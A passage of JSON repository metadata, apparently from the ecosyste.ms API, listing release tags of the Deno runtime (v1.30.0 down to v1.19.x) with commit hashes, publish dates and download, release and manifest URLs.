0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms